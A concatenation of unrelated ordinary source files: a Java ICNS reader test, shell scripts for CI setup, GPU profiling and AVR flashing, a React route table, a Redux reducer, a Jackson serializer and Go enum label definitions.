* @version $Id: ICNSImageReaderTest.java,v 1.0 25.10.11 18:44 haraldk Exp$
*/
/**
 * Concrete test-data provider for the shared {@code ImageReaderAbstractTest}
 * suite, exercising the ICNS reader against a set of sample .icns files with
 * known icon sizes. Subsampled and source-region reads are known limitations
 * of the reader and their inherited tests are {@code @Ignore}d below.
 */
public class ICNSImageReaderTest extends ImageReaderAbstractTest {
    @Override
    protected List<TestData> getTestData() {
        // Each TestData pairs a resource with the expected dimensions of
        // every icon contained in it, in file order.
        return Arrays.asList(
                new TestData(
                        getClassLoaderResource("/icns/GenericJavaApp.icns"),
                        new Dimension(16, 16), // 1 bit + 1 bit mask
                        new Dimension(16, 16), new Dimension(16, 16), // 8 bit CMAP, 24 bit + 8 bit mask
                        new Dimension(32, 32), // 1 bit + 1 bit mask
                        new Dimension(32, 32), new Dimension(32, 32), // 8 bit CMAP, 24 bit + 8 bit mask
                        new Dimension(128, 128) // 24 bit + 8 bit mask
                ),
                new TestData(
                        getClassLoaderResource("/icns/Apple Retro.icns"),
                        new Dimension(16, 16), // 24 bit + 8 bit mask
                        new Dimension(32, 32), // 24 bit + 8 bit mask
                        new Dimension(48, 48), // 24 bit + 8 bit mask
                        new Dimension(128, 128), // 24 bit + 8 bit mask
                        new Dimension(256, 256), // JPEG 2000 ic08
                        new Dimension(512, 512) // JPEG 2000 ic09
                ),
                new TestData(
                        getClassLoaderResource("/icns/7zIcon.icns"), // Contains the icnV resource, that isn't an icon
                        new Dimension(16, 16), // 24 bit + 8 bit mask
                        new Dimension(32, 32), // 24 bit + 8 bit mask
                        new Dimension(128, 128), // 24 bit + 8 bit mask
                        new Dimension(256, 256), // JPEG 2000 ic08
                        new Dimension(512, 512) // JPEG 2000 ic09
                ),
                new TestData(
                        getClassLoaderResource("/icns/appStore.icns"), // Contains the 'TOC ' and icnV resources + PNGs in ic08-10
                        new Dimension(16, 16), // 24 bit + 8 bit mask
                        new Dimension(32, 32), // 24 bit + 8 bit mask
                        new Dimension(128, 128), // 24 bit + 8 bit mask
                        new Dimension(256, 256), // PNG ic08
                        new Dimension(512, 512), // PNG ic09
                        new Dimension(1024, 1024) // PNG ic10
                ),
                new TestData(
                        getClassLoaderResource("/icns/XLW.icns"), // No 8 bit mask for 16x16 & 32x32, fall back to 1 bit mask
                        new Dimension(16, 16), // 1 bit + 1 bit mask
                        new Dimension(16, 16), new Dimension(16, 16), // 4 bit CMAP, 8 bit CMAP (no 8 bit mask)
                        new Dimension(32, 32), // 1 bit + 1 bit mask
                        new Dimension(32, 32), new Dimension(32, 32), // 4 bit CMAP, 8 bit CMAP (no 8 bit mask)
                        new Dimension(128, 128) // 24 bit + 8 bit mask
                ),
                new TestData(
                        getClassLoaderResource("/icns/XMLExport.icns"), // No masks at all, uncompressed 32 bit data
                        new Dimension(128, 128), // 32 bit interleaved
                        new Dimension(48, 48), // 32 bit interleaved
                        new Dimension(32, 32), // 32 bit interleaved
                        new Dimension(16, 16) // 32 bit interleaved
                )
        );
    }

    @Override
    protected ImageReaderSpi createProvider() {
        return new ICNSImageReaderSpi();
    }

    @Override
    protected ImageReader createReader() {
        return new ICNSImageReader();
    }

    @Override
    protected Class getReaderClass() {
        return ICNSImageReader.class;
    }

    @Override
    protected List<String> getFormatNames() {
        return Collections.singletonList("icns");
    }

    @Override
    protected List<String> getSuffixes() {
        return Collections.singletonList("icns");
    }

    @Override
    protected List<String> getMIMETypes() {
        return Collections.singletonList("image/x-apple-icons");
    }

    @Test
    @Ignore("Known issue: Subsampled reading not supported")
    @Override
    public void testReadWithSubsampleParamPixels() throws IOException {
        super.testReadWithSubsampleParamPixels();
    }

    @Test
    @Ignore("Known issue: Source region reading not supported")
    @Override
    public void testReadWithSourceRegionParamEqualImage() throws IOException {
        super.testReadWithSourceRegionParamEqualImage();
    }
}
|
#!/bin/bash
#= Drop_File_Rename_Proper.sh
#
# Create Automator script Drop_File_Showpath.app using "Run Shell Script" and copy/paste there contents of this .sh file
# Print one classification line for a dropped item.
#   $1 - type flag: d=directory, f=regular file, ?=anything else
#   $2 - the path that was dropped
function do_print {
  echo "# Drop_File_Rename_Proper TYPE=$1 FILENAME='$2' "
}

# Classify every argument handed to the droplet, one line each.
for ITEM in "$@" ; do
  if [[ -f "${ITEM}" ]]; then
    do_print "f" "${ITEM}"
  elif [[ -d "${ITEM}" ]]; then
    do_print "d" "${ITEM}"
  else
    do_print "?" "${ITEM}"
  fi
done
#-EOF
|
'use strict';

// Map of accepted address-component type names to their canonical values.
// Most entries map to themselves; a few (state, suburb, unit) are friendly
// aliases for the canonical type on the right-hand side.
module.exports = {
  administrative_area_level_1: 'administrative_area_level_1',
  administrative_area_level_2: 'administrative_area_level_2',
  administrative_area_level_3: 'administrative_area_level_3',
  administrative_area_level_4: 'administrative_area_level_4',
  administrative_area_level_5: 'administrative_area_level_5',
  airport: 'airport',
  bus_station: 'bus_station',
  colloquial_area: 'colloquial_area',
  country: 'country',
  establishment: 'establishment',
  floor: 'floor',
  intersection: 'intersection',
  locality: 'locality',
  natural_feature: 'natural_feature',
  neighborhood: 'neighborhood',
  park: 'park',
  parking: 'parking',
  point_of_interest: 'point_of_interest',
  political: 'political',
  postal_code: 'postal_code',
  postal_town: 'postal_town',
  post_box: 'post_box',
  premise: 'premise',
  room: 'room',
  route: 'route',
  state: 'administrative_area_level_1', // alias
  street_address: 'street_address',
  street_number: 'street_number',
  sublocality: 'sublocality',
  subpremise: 'subpremise',
  suburb: 'locality', // alias
  train_station: 'train_station',
  transit_station: 'transit_station',
  unit: 'subpremise', // alias
  ward: 'ward',
};
|
#!/bin/bash
# Fix: the shebang was previously placed below the license header, where it
# has no effect; it must be the first line of the file.
#
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Profile FasterXLNet against a TensorFlow-XLA baseline over a grid of
# sequence lengths and batch sizes.

# GPU-related setting
gpu_id=0
gemm_file=../gemm/gemm.fp32.1080ti
#gemm_file=../gemm/gemm.fp16.1080ti

# Meta perameters
batch_size=8
seq_len=128
warm_up_ite=50
profile_ite=100

#Input
json_file=./xlnet_config.json

# Parameters for Fasterxlnet
run_mode=2 #FP32_TIME_TEST=2
#run_mode=0 #FP16_TIME_TEST=0

for seq_len in 32 #64 128
do
    for batch_size in 1 8
    do
        # Run tensorflow xla to collect baseline
        cm="python3 ../python/runProfile.py -s $seq_len -b $batch_size -w $warm_up_ite -t $profile_ite -j $json_file"
        echo COMMAND: $cm
        TF_XLA_FLAGS="--tf_xla_auto_jit=2" CUDA_VISIBLE_DEVICES=$gpu_id $cm

        # Run the FasterXLNet benchmark binary with the same shape settings
        cm="../runTest -m $run_mode -g $gpu_id -e $gemm_file -s $seq_len -b $batch_size -w $warm_up_ite -t $profile_ite -j $json_file"
        echo COMMAND: $cm
        $cm
    done
done
|
package libs.trustconnector.scdp.util.tlv.simpletlv;
import libs.trustconnector.scdp.util.tlv.*;
import libs.trustconnector.scdp.util.tlv.Length;
import libs.trustconnector.scdp.util.tlv.Tag;
/**
 * Simple-TLV wrapper for the 2-byte "Buffer Size" value (tag 0x39).
 */
public class BufferSize extends SimpleTLV
{
    /** Tag number identifying a Buffer Size TLV (0x39). */
    private static final int BUFFER_SIZE_TAG = 57;

    /** Length in bytes of the encoded buffer-size value. */
    private static final int VALUE_LENGTH = 2;

    /** Wraps an already-parsed TLV (tag, length and raw value bytes). */
    public BufferSize(final Tag tag, final Length len, final byte[] v, final int vOff) {
        super(tag, len, v, vOff);
    }

    /** Builds a Buffer Size TLV holding the given size as a 2-byte value. */
    public BufferSize(final int size) {
        super(BUFFER_SIZE_TAG, size, VALUE_LENGTH);
    }

    /** @return the buffer size decoded from the first two value bytes. */
    public int getBufferSize() {
        final int size = this.value.getInt2(0);
        return size;
    }

    @Override
    public String toString() {
        final int size = this.value.getInt2(0);
        return String.format("Buffer Size=0x%04X", size);
    }
}
|
<reponame>machnicki/healthunlocked<gh_stars>0
import React from 'react';
import { Route } from 'react-router';
import App from './App';
import RepoPage from './pages/RepoPage';
import UserPage from './pages/UserPage';
// Route table (old react-router v0.13-style API: components are registered via
// the `handler` prop rather than `component`/`element`).
export default (
  <Route name='explore' path='/' handler={App}>
    {/* /:login/:name — repository detail page */}
    <Route name='repo' path='/:login/:name' handler={RepoPage} />
    {/* /:login — user profile page */}
    <Route name='user' path='/:login' handler={UserPage} />
  </Route>
);
|
/*
* Copyright [2020-2030] [https://www.stylefeng.cn]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Guns采用APACHE LICENSE 2.0开源协议,您在使用过程中,需要注意以下几点:
*
* 1.请不要删除和修改根目录下的LICENSE文件。
* 2.请不要删除和修改Guns源码头部的版权声明。
* 3.请保留源码和相关描述文件的项目出处,作者声明等。
* 4.分发源码时候,请注明软件出处 https://gitee.com/stylefeng/guns
* 5.在修改包名,模块名称,项目代码等时,请注明软件出处 https://gitee.com/stylefeng/guns
* 6.若您的项目无法满足以上几点,可申请商业授权
*/
package cn.stylefeng.roses.kernel.dict.api.serializer;
import cn.hutool.core.util.StrUtil;
import cn.stylefeng.roses.kernel.dict.api.context.DictContext;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.databind.JavaType;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.SerializerProvider;
import com.fasterxml.jackson.databind.annotation.JacksonStdImpl;
import com.fasterxml.jackson.databind.jsonFormatVisitors.JsonFormatVisitorWrapper;
import com.fasterxml.jackson.databind.jsontype.TypeSerializer;
import com.fasterxml.jackson.databind.ser.std.StdScalarSerializer;
import java.io.IOException;
import java.lang.reflect.Type;
/**
 * Jackson serializer that renders a "dictTypeCode|dictCode" field value as the
 * corresponding dictionary name(s).
 * <p>
 * Usage notes:
 * <p>
 * 1. Annotate the POJO field with @JsonSerialize(using = DictValueSerializer.class).
 * 2. The field value must have the form "dictTypeCode|dictCode"; the code part
 *    may hold several codes separated by commas, in which case the resolved
 *    names are joined with commas as well.
 *
 * @author liuhanqing
 * @date 2021/1/16 22:21
 */
@JacksonStdImpl
public final class DictValueSerializer extends StdScalarSerializer<Object> {

    private static final long serialVersionUID = 1L;

    /**
     * Separator between the dictionary type code and the dictionary code
     */
    private static final String SEPARATOR = "|";

    /**
     * Literal "null" marker, treated the same as an empty value
     */
    private static final String NULL_STR = "null";

    /**
     * Separator between multiple dictionary codes (and between resolved names)
     */
    private static final String VALUE_SEPARATOR = ",";

    public DictValueSerializer() {
        super(String.class, false);
    }

    @Override
    public boolean isEmpty(SerializerProvider prov, Object value) {
        // Fix: the previous implementation cast to String, which throws a
        // ClassCastException for non-String values and an NPE for null.
        return value == null || value.toString().isEmpty();
    }

    @Override
    public void serialize(Object value, JsonGenerator gen, SerializerProvider provider) throws IOException {
        if (value == null) {
            gen.writeNull();
            return;
        }
        // Raw value of the serialized field
        String fieldValue = value.toString();
        // Blank, or missing the "type|code" separator: write an empty string
        if (StrUtil.isBlank(fieldValue) || !fieldValue.contains(SEPARATOR)) {
            gen.writeString(StrUtil.EMPTY);
            return;
        }
        // Split into dictionary type code and dictionary code
        String[] dictTypeCodeAndDictCode = fieldValue.split("\\|");
        // Anything other than exactly two parts is malformed
        if (dictTypeCodeAndDictCode.length != 2) {
            gen.writeString(StrUtil.EMPTY);
            return;
        }
        String dictTypeCode = dictTypeCodeAndDictCode[0];
        String dictCode = dictTypeCodeAndDictCode[1];
        // Empty (or literal "null") dictionary code: write an empty string
        if (StrUtil.isBlank(dictCode) || NULL_STR.equals(dictCode)) {
            gen.writeString(StrUtil.EMPTY);
            return;
        }
        // Multiple dictionary codes separated by commas: resolve each one
        if (dictCode.contains(VALUE_SEPARATOR)) {
            String[] dictCodeArray = dictCode.split(VALUE_SEPARATOR);
            StringBuilder dictNames = new StringBuilder();
            for (String singleDictCode : dictCodeArray) {
                String dictName = DictContext.me().getDictName(dictTypeCode, singleDictCode);
                if (StrUtil.isNotBlank(dictName)) {
                    dictNames.append(dictName).append(VALUE_SEPARATOR);
                }
            }
            gen.writeString(StrUtil.removeSuffix(dictNames.toString(), VALUE_SEPARATOR));
            return;
        }
        // Single dictionary code
        String dictName = DictContext.me().getDictName(dictTypeCode, dictCode);
        // Fix: guard against an unresolved (null) name; JsonGenerator.writeString
        // rejects null arguments.
        gen.writeString(dictName == null ? StrUtil.EMPTY : dictName);
    }

    @Override
    public final void serializeWithType(Object value, JsonGenerator gen, SerializerProvider provider,
                                        TypeSerializer typeSer) throws IOException {
        // No type info is written; delegate to regular serialization so the
        // dictionary lookup applies here too. Fix: the previous raw (String)
        // cast skipped the lookup entirely and broke for non-String values.
        serialize(value, gen, provider);
    }

    @Override
    public JsonNode getSchema(SerializerProvider provider, Type typeHint) {
        return createSchemaNode("string", true);
    }

    @Override
    public void acceptJsonFormatVisitor(JsonFormatVisitorWrapper visitor, JavaType typeHint) throws JsonMappingException {
        visitStringFormat(visitor, typeHint);
    }
}
|
#!/bin/bash
# This script is meant to be called by the "install" step defined in
# .travis.yml. See http://docs.travis-ci.com/ for more details.
# The behavior of the script is controlled by environment variables defined
# in the .travis.yml in the top level folder of the project.
# License: 3-clause BSD
# Travis clone pydicom/pydicom repository in to a local repository.

# Abort on first failure.
set -e

# Compile through ccache to speed up repeated builds.
export CC=/usr/lib/ccache/gcc
export CXX=/usr/lib/ccache/g++
# Useful for debugging how ccache is used
# export CCACHE_LOGFILE=/tmp/ccache.log
# ~60M is used by .ccache when compiling from scratch at the time of writing
ccache --max-size 100M --show-stats
# Deactivate the travis-provided virtual environment and setup a
# conda-based environment instead
deactivate
# Install miniconda
wget https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh \
-O miniconda.sh
MINICONDA_PATH=/home/travis/miniconda
chmod +x miniconda.sh && ./miniconda.sh -b -p $MINICONDA_PATH
export PATH=$MINICONDA_PATH/bin:$PATH
# Configure the conda environment and put it in the path using the
# provided versions
conda create -n testenv --yes python=$PYTHON_VERSION pip
source activate testenv
pip install --upgrade pip setuptools
# Nightly wheels of the scientific stack (rackcdn mirror used by numpy/scipy CI).
echo "Installing numpy and scipy master wheels"
dev_url=https://7933911d6844c6c53a7d-47bd50c35cd79bd838daf386af554a83.ssl.cf2.rackcdn.com
pip install --pre --upgrade --timeout=60 -f $dev_url numpy scipy pandas cython
echo "Installing joblib master"
pip install https://github.com/joblib/joblib/archive/master.zip
# Optional deep-learning dependencies, selected via $OPTIONAL_DEPS.
if [[ "$OPTIONAL_DEPS" == "keras" ]]; then
conda install --yes keras tensorflow=1
KERAS_BACKEND=tensorflow
python -c "import keras.backend"
sed -i -e 's/"backend":[[:space:]]*"[^"]*/"backend":\ "'$KERAS_BACKEND'/g' ~/.keras/keras.json;
elif [[ "$OPTIONAL_DEPS" == "tensorflow" ]]; then
conda install --yes tensorflow
fi
# Nightly scikit-learn build plus test/coverage tooling.
pip install --pre --extra-index https://pypi.anaconda.org/scipy-wheels-nightly/simple scikit-learn
conda install --yes pytest pytest-cov
pip install codecov
pip install -U git+https://github.com/numpy/numpydoc.git
# Report the resolved versions, then install the project itself in editable mode.
python --version
python -c "import numpy; print('numpy %s' % numpy.__version__)"
python -c "import scipy; print('scipy %s' % scipy.__version__)"
pip install -e .
ccache --show-stats
# Useful for debugging how ccache is used
# cat $CCACHE_LOGFILE
|
<filename>src/state/QueueSummaryState.js
import * as Constants from '../utils/Constants';
// Redux action type identifiers for the queue-summary state slice.
const ACTION_SET_FILTERS = "SET_FILTERS"; // Not used
const ACTION_SET_QUEUES = "SET_QUEUES";
const ACTION_SET_QUEUE_TASKS = "SET_QUEUE_TASKS";
const ACTION_HANDLE_TASK_UPDATED = "HANDLE_TASK_UPDATED";
const ACTION_HANDLE_TASK_REMOVED = "HANDLE_TASK_REMOVED";
const ACTION_SET_SELECTED_QUEUE = "SET_SELECTED_QUEUE"; // Not used
const ACTION_RECALCULATE_FILTERS = "RECALCULATE_FILTERS"; // Not used
const ACTION_SET_SELECTED_TASK = 'SET_SELECTED_TASK';
const ACTION_REMOVE_SELECTED_TASK = 'REMOVE_SELECTED_TASK';

// Initial shape of the queue-summary slice.
const initialState = {
  filters: [],                  // active filters (feature currently unused)
  queues: undefined,            // array of queue objects; each gains tasks + columnStats
  selectedQueueSid: undefined,  // currently selected queue (unused)
  selectedTaskSid: undefined,   // currently selected task, if any
  config: Constants.CONFIG      // plugin configuration (e.g. task columns)
};
// Action creators for the queue-summary state slice.
export class Actions {
  // (Filters feature is currently unused.)
  static setFilters(filters) {
    return { type: ACTION_SET_FILTERS, filters };
  }

  static setQueues(queues) {
    return { type: ACTION_SET_QUEUES, queues };
  }

  static setQueueTasks(queueSid, tasks) {
    return {
      type: ACTION_SET_QUEUE_TASKS,
      payload: { queueSid, tasks },
    };
  }

  static handleTaskUpdated(task) {
    return { type: ACTION_HANDLE_TASK_UPDATED, task };
  }

  static handleTaskRemoved(taskSid) {
    return { type: ACTION_HANDLE_TASK_REMOVED, taskSid };
  }

  static setSelectedQueue(selectedQueueSid) {
    return { type: ACTION_SET_SELECTED_QUEUE, selectedQueueSid };
  }

  static setSelectedTask(selectedTaskSid) {
    return { type: ACTION_SET_SELECTED_TASK, selectedTaskSid };
  }

  static removeSelectedTask() {
    return { type: ACTION_REMOVE_SELECTED_TASK };
  }

  static recalculateFilters() {
    return { type: ACTION_RECALCULATE_FILTERS };
  }
}
// Reducer for the queue-summary state slice: maps (state, action) -> new state.
export function reduce(state = initialState, action) {
  switch (action.type) {
    case ACTION_SET_FILTERS:
      return {
        ...state,
        filters: action.filters,
      };
    case ACTION_SET_QUEUES:
      return {
        ...state,
        queues: action.queues,
      };
    case ACTION_SET_QUEUE_TASKS:
      return {
        ...state,
        queues: state.queues.map((item) => {
          // Update the matching queue; non-matching queues are left untouched.
          if (item.queue_sid === action.payload.queueSid) {
            return {
              ...item,
              tasks: action.payload.tasks,
              columnStats: getTaskStatsForColumns(action.payload.tasks, state.config)
            };
          }
          return item;
        }),
      };
    case ACTION_HANDLE_TASK_UPDATED:
      return {
        ...state,
        queues: state.queues.map(queue => {
          if (queue.queue_name === action.task.queue_name) {
            // Insert the task if new, otherwise replace the stored copy.
            const copyOfTasks = [...queue.tasks];
            const existingTaskIndex = copyOfTasks.findIndex(t => t.task_sid === action.task.task_sid);
            if (existingTaskIndex < 0) {
              copyOfTasks.push(action.task);
            } else {
              copyOfTasks[existingTaskIndex] = action.task;
            }
            return {
              ...queue,
              tasks: copyOfTasks,
              columnStats: getTaskStatsForColumns(copyOfTasks, state.config)
            };
          }
          return queue;
        }),
      };
    case ACTION_HANDLE_TASK_REMOVED:
      return {
        ...state,
        queues: state.queues.map(queue => {
          const existingTaskIndex = queue.tasks.findIndex(t => t.task_sid === action.taskSid);
          if (existingTaskIndex >= 0) {
            const filteredTasks = queue.tasks.filter(task => task.task_sid !== action.taskSid);
            return {
              ...queue,
              tasks: filteredTasks,
              columnStats: getTaskStatsForColumns(filteredTasks, state.config)
            };
          }
          return queue;
        }),
      };
    case ACTION_SET_SELECTED_QUEUE:
      return {
        ...state,
        selectedQueueSid: action.selectedQueueSid,
      };
    case ACTION_SET_SELECTED_TASK:
      return {
        ...state,
        selectedTaskSid: action.selectedTaskSid,
      };
    case ACTION_REMOVE_SELECTED_TASK:
      return {
        ...state,
        selectedTaskSid: undefined,
      };
    case ACTION_RECALCULATE_FILTERS:
      return {
        ...state,
        // Fix: the previous code spread an undefined global `filters`
        // (ReferenceError at runtime). Recalculation now produces a fresh
        // copy of the current filters so subscribers see a new reference.
        filters: [...state.filters],
      };
    default:
      return state;
  }
}

// Builds, for each configured task-attribute column, a Map of
// attributeValue -> { taskCount, oldestDateCreated }, sorted by descending
// task count. Returns an array with one Map per configured column.
function getTaskStatsForColumns(tasks, config) {
  const columns = config[Constants.CONFIG_QUEUE_TASK_COLUMNS];
  return columns.map((taskAttribute) => {
    // Start with tasks that actually carry this attribute. The task list is
    // already sorted by age, so the first match per value is the oldest.
    const tasksWithAttribute = tasks.filter((task) => task.attributes[taskAttribute]);
    const uniqueValues = [...new Set(tasksWithAttribute.map((task) => task.attributes[taskAttribute]))];
    const columnStatsMap = new Map();
    uniqueValues.forEach((taskAttributeValue) => {
      const tasksByAttributeValue = tasksWithAttribute.filter(
        (task) => task.attributes[taskAttribute] === taskAttributeValue
      );
      columnStatsMap.set(taskAttributeValue, {
        taskCount: tasksByAttributeValue.length,
        oldestDateCreated: tasksByAttributeValue[0].date_created,
      });
    });
    // Fix: the comparator previously read `.taskCount` off the raw
    // [key, stats] entry pair (and had a `tasksCount` typo), so the sort
    // never worked. Entries are [value, stats]; sort by descending count.
    return new Map(
      [...columnStatsMap.entries()].sort(([, a], [, b]) => b.taskCount - a.taskCount)
    );
  });
}
|
#!/usr/bin/env bash
# Runs the Jenkins X BDD test suite against a GitHub Enterprise instance,
# using an isolated JX_HOME so local git credentials do not interfere.

set -e
set -x

echo "BRANCH_NAME=$BRANCH_NAME"
echo "the downward API labels are:"
cat /etc/podinfo/labels

# fix broken `BUILD_NUMBER` env var
export BUILD_NUMBER="$BUILD_ID"

# Isolated home for jx state and kube config for this run.
JX_HOME="/tmp/jxhome"
KUBECONFIG="/tmp/jxhome/config"

# lets avoid the git/credentials causing confusion during the test
export XDG_CONFIG_HOME=$JX_HOME
mkdir -p $JX_HOME/git

jx --version

# replace the credentials file with a single user entry
echo "https://dev1:$GHE_ACCESS_TOKEN@github.beescloud.com" > $JX_HOME/git/credentials

# Authenticate to GCP with the provided service-account key.
gcloud auth activate-service-account --key-file $GKE_SA

# lets setup git
git config --global --add user.name JenkinsXBot
git config --global --add user.email jenkins-x@googlegroups.com

# Disable checking that the PipelineActivity has been updated by the build controller properly, since we're not using the build controller with static masters.
export BDD_DISABLE_PIPELINEACTIVITY_CHECK=true

echo "running the BDD tests with JX_HOME = $JX_HOME"

# Kick off the BDD suite against GHE (install + spring-creation tests only).
jx step bdd --use-revision --version-repo-pr --versions-repo https://github.com/jenkins-x/jenkins-x-versions.git --config jx/bdd/static/cluster.yaml --gopath /tmp --git-provider=ghe --git-provider-url=https://github.beescloud.com --git-username dev1 --git-api-token $GHE_ACCESS_TOKEN --default-admin-password $JENKINS_PASSWORD --no-delete-app --no-delete-repo --tests install --tests test-create-spring
|
#!/bin/bash -e
# Flashes firmware onto an ATmega2560 over a serial port using avrdude.
# Usage: ./flash.sh <serial-port> <firmware-file>

port="$1"
file="$2"

# Validate arguments before touching any hardware.
if [[ -z "$port" || -z "$file" ]]; then
    echo "Usage: $0 <serial-port> <firmware-file>" >&2
    exit 1
fi

if [[ ! -w "$port" ]]; then
    echo "Waiting for serial port to appear..."
    # Fix: poll with a short sleep instead of busy-spinning (the original
    # `while ...; do true; done` pegged a CPU core).
    while [[ ! -w "$port" ]]; do
        sleep 0.1
    done
else
    echo "Resetting controller..."
    rosrun drc_interface controller_tool --device="$port" --reset
fi

# Fix: use the named $file variable (the original referenced raw "$2",
# bypassing the variable it had just assigned).
avrdude -c avr109 -p atmega2560 -b 115200 -P "$port" -U flash:w:"$file"
|
<gh_stars>1-10
// Copyright © 2019 The Things Network Foundation, The Things Industries B.V.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package ttnpb
import (
"fmt"
"go.thethings.network/lorawan-stack/v3/pkg/i18n"
)
// defineEnum registers a human-readable description for an enum value in the
// i18n message registry, keyed as "enum:<value>".
// NOTE(review): SetSource(1) appears to record the caller as the message's
// definition source — confirm against the i18n package documentation.
func defineEnum(e fmt.Stringer, message string) {
	i18n.Define("enum:"+e.String(), message).SetSource(1)
}
// init registers English descriptions for every enum value defined in this
// package so they can be rendered (and translated) via the i18n registry.
func init() {
	// OAuth grant types.
	defineEnum(GrantType_GRANT_AUTHORIZATION_CODE, "authorization code")
	defineEnum(GrantType_GRANT_PASSWORD, "username and password")
	defineEnum(GrantType_GRANT_REFRESH_TOKEN, "refresh token")
	// Entity review states.
	defineEnum(State_STATE_REQUESTED, "requested and pending review")
	defineEnum(State_STATE_APPROVED, "reviewed and approved")
	defineEnum(State_STATE_REJECTED, "reviewed and rejected")
	defineEnum(State_STATE_FLAGGED, "flagged and pending review")
	defineEnum(State_STATE_SUSPENDED, "reviewed and suspended")
	// Contact types and methods.
	defineEnum(ContactType_CONTACT_TYPE_OTHER, "other")
	defineEnum(ContactType_CONTACT_TYPE_ABUSE, "abuse")
	defineEnum(ContactType_CONTACT_TYPE_BILLING, "billing")
	defineEnum(ContactType_CONTACT_TYPE_TECHNICAL, "technical")
	defineEnum(ContactMethod_CONTACT_METHOD_OTHER, "other")
	defineEnum(ContactMethod_CONTACT_METHOD_EMAIL, "email")
	defineEnum(ContactMethod_CONTACT_METHOD_PHONE, "phone")
	// LoRaWAN message types (MType).
	defineEnum(MType_JOIN_REQUEST, "join request")
	defineEnum(MType_JOIN_ACCEPT, "join accept")
	defineEnum(MType_UNCONFIRMED_UP, "unconfirmed uplink")
	defineEnum(MType_UNCONFIRMED_DOWN, "unconfirmed downlink")
	defineEnum(MType_CONFIRMED_UP, "confirmed uplink")
	defineEnum(MType_CONFIRMED_DOWN, "confirmed downlink")
	defineEnum(MType_REJOIN_REQUEST, "rejoin request")
	defineEnum(MType_PROPRIETARY, "proprietary")
	// Join and rejoin request types.
	defineEnum(JoinRequestType_REJOIN_CONTEXT, "rejoin to renew context")
	defineEnum(JoinRequestType_REJOIN_SESSION, "rejoin to renew session")
	defineEnum(JoinRequestType_REJOIN_KEYS, "rejoin to renew keys")
	defineEnum(JoinRequestType_JOIN, "join")
	defineEnum(RejoinRequestType_CONTEXT, "renew context")
	defineEnum(RejoinRequestType_SESSION, "renew session")
	defineEnum(RejoinRequestType_KEYS, "renew keys")
	// Channel frequency list (CFList) types.
	defineEnum(CFListType_FREQUENCIES, "frequencies")
	defineEnum(CFListType_CHANNEL_MASKS, "channel masks")
	// MAC command identifiers (CIDs).
	defineEnum(MACCommandIdentifier_CID_RFU_0, "RFU")
	defineEnum(MACCommandIdentifier_CID_RESET, "reset")
	defineEnum(MACCommandIdentifier_CID_LINK_CHECK, "link check")
	defineEnum(MACCommandIdentifier_CID_LINK_ADR, "adaptive data rate")
	defineEnum(MACCommandIdentifier_CID_DUTY_CYCLE, "duty cycle")
	defineEnum(MACCommandIdentifier_CID_RX_PARAM_SETUP, "receive parameters")
	defineEnum(MACCommandIdentifier_CID_DEV_STATUS, "device status")
	defineEnum(MACCommandIdentifier_CID_NEW_CHANNEL, "new channel")
	defineEnum(MACCommandIdentifier_CID_RX_TIMING_SETUP, "receive timing")
	defineEnum(MACCommandIdentifier_CID_TX_PARAM_SETUP, "transmit parameters")
	defineEnum(MACCommandIdentifier_CID_DL_CHANNEL, "downlink channel")
	defineEnum(MACCommandIdentifier_CID_REKEY, "rekey")
	defineEnum(MACCommandIdentifier_CID_ADR_PARAM_SETUP, "adaptive data rate parameters")
	defineEnum(MACCommandIdentifier_CID_DEVICE_TIME, "device time")
	defineEnum(MACCommandIdentifier_CID_FORCE_REJOIN, "force rejoin")
	defineEnum(MACCommandIdentifier_CID_REJOIN_PARAM_SETUP, "rejoin parameters")
	defineEnum(MACCommandIdentifier_CID_PING_SLOT_INFO, "ping slot info")
	defineEnum(MACCommandIdentifier_CID_PING_SLOT_CHANNEL, "ping slot channel")
	defineEnum(MACCommandIdentifier_CID_BEACON_TIMING, "beacon timing")
	defineEnum(MACCommandIdentifier_CID_BEACON_FREQ, "beacon frequency")
	defineEnum(MACCommandIdentifier_CID_DEVICE_MODE, "device mode")
	// Location sources.
	defineEnum(LocationSource_SOURCE_UNKNOWN, "unknown location source")
	defineEnum(LocationSource_SOURCE_GPS, "determined by GPS")
	defineEnum(LocationSource_SOURCE_REGISTRY, "set in and updated from a registry")
	defineEnum(LocationSource_SOURCE_IP_GEOLOCATION, "estimated with IP geolocation")
	defineEnum(LocationSource_SOURCE_WIFI_RSSI_GEOLOCATION, "estimated with WiFi RSSI geolocation")
	defineEnum(LocationSource_SOURCE_BT_RSSI_GEOLOCATION, "estimated with Bluetooth RSSI geolocation")
	defineEnum(LocationSource_SOURCE_LORA_RSSI_GEOLOCATION, "estimated with LoRa RSSI geolocation")
	defineEnum(LocationSource_SOURCE_LORA_TDOA_GEOLOCATION, "estimated with LoRa TDOA geolocation")
	defineEnum(LocationSource_SOURCE_COMBINED_GEOLOCATION, "estimated by a combination of geolocation sources")
	// Payload formatter kinds.
	defineEnum(PayloadFormatter_FORMATTER_NONE, "no formatter")
	defineEnum(PayloadFormatter_FORMATTER_REPOSITORY, "defined by end device type repository")
	defineEnum(PayloadFormatter_FORMATTER_GRPC_SERVICE, "gRPC service")
